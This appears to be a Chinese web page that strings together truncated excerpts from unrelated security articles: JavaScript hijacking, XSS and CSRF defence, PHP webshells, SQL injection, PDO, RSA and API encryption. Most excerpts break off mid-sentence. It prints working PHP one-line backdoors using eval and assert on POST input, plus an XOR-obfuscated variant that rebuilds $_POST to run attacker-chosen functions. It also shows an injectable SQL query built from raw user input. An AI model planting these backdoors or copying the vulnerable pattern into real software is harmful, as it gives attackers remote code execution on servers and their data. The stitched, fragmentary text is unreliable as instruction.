什么是javascript劫持

javascript劫持属于HTTP劫持中的一种，主要是劫持js文件，然后在网页中通过js脚本往网页中注入图片和链接或者框架广告，也叫流量劫持。 文明一点的劫持只是右下角放一个固定广告，不文明的就自动弹出新广告窗口（一般会被浏览器拦截）或者给整个网页添加点击事件弹出新广告页面。

javascript劫持套路

1、document.write注入

对网站发动XSS攻击的方式有很多种，仅仅使用php的一些内置过滤函数是对付不了的，即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全。

那么如何预防 XSS 注入？主要还是需要在用户数据过滤方面得考虑周全，在这里不完全总结下几个 Tips

1. 假定所有的用户输入数据都是“邪恶”的
2. 弱类型的脚本语言必须保证类型和期望的一致
3. 考虑周全的正则表达式
4. strip_tags、htmlspecialchars 这类函数很好用 <b

一个最常见的一句话后门可能写作这样

<?php @eval($_POST['cmd']);?>

或这样

<?php @assert($_POST['cmd']);?>

tudouya 同学在FREEBUF上给出[一种构造技巧]利用

 <?php  @$_++; // $_ = 1  $__=("#"^"|"); // $__ = _   $__.=("."^"~"); // _P   $__.=("/"^"`"); // _PO   $__.=("|"^"/"); // _POS   $__.=("{"^"/"); // _POST   ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  ?>

进入数字信息时代之后，消费者对自身的隐私安全越来越重视，而对于 iPhone 用户来说，隐私信息并不仅限于手机本身，还需要考虑 iCloud 和 Apple ID 等方面的信息安全。今天，我们就来说一说提升 iPhone 用户隐私安全等级的 8 个小技巧，一起来看看吧。

1. 开启 Find My iPhone 功能

　　最近22万个iCloud账户被盗事件相信大家都知道了，那么怎么才能查询到自己的iCloud帐号密码是否泄漏了呢？小编下面就给大家推荐一款iCloud盗号木马查杀工具，希望可以帮助大家监测自己的帐号是否被盗。

　　我们已经知道该恶意程序是主要

跨站攻击就是利用程序上的一些细节或bug问题进行的，那么我们要如何耿防止跨站攻击呢？下面就以一个防止跨站攻击例子来说明，希望对各位有帮助。

<?php
 #demo for prevent csrf
 /**
 * enc
 */
 function encrypt($token_time) {
 return md5('!@##$@$$#%43' . $token_time);

一、问题描述：

　　如果用户输入的数据在未经处理的情况下插入到一条SQL查询语句，那么应用将很可能遭受到SQL注入攻击，正如下面的例子：

$unsafe_variable = $_POST['user_input']; 
  
 mysql_query("INSERT INTO `table` (`column`) VALUES ('" . $unsafe_variable . "')");

我们都知道，只要合理正确使用PDO,可以基本上防止SQL注入的产生，本文主要回答以下两个问题：

为什么要使用PDO而不是mysql_connect？
为何PDO能防注入？
使用PDO防注入的时候应该特别注意什么?
 
一、为何要优先使用PDO?

PHP手册上说得很清楚：
Prepared statements and stored procedures<b

1.首先介绍下什么是RSA算法,让大家对RSA算法有个简要的理解.
   RSA算法非常简单，概述如下:
找两素数p和q
取n=p*q  如:n=3*7=21
取t=(p-1)*(q-1) 如:t = 2*6 = 12
 　 取任何一个数e,要求满足e 
取d*e%t==1  如:d=7,e=7,则7*7/12刚好等于1满足要求

移动应用中，通过在客户端对访问的url进行加密处理来保护服务器上的数据

我认为，保护服务器端的数据，有这么几个关键点：

1、不能对使用体验产生影响，这就排除掉了诸如每次接口调用都要求用户输入验证码这样的做法
2、接口调用的网络交互需要无规律可循，比如article/1 –> article/1000 这样的接口就太容易被其他人爬走了
3、要严格意义上阻击爬虫，需要每一次网络请求都是不可重放的，这样才能避免其他人通过监听网络交互并重放来爬取数据
4、对服务器端编码不产生太大影响，如果要对服务器端伤筋动骨的大改，肯定是要不得的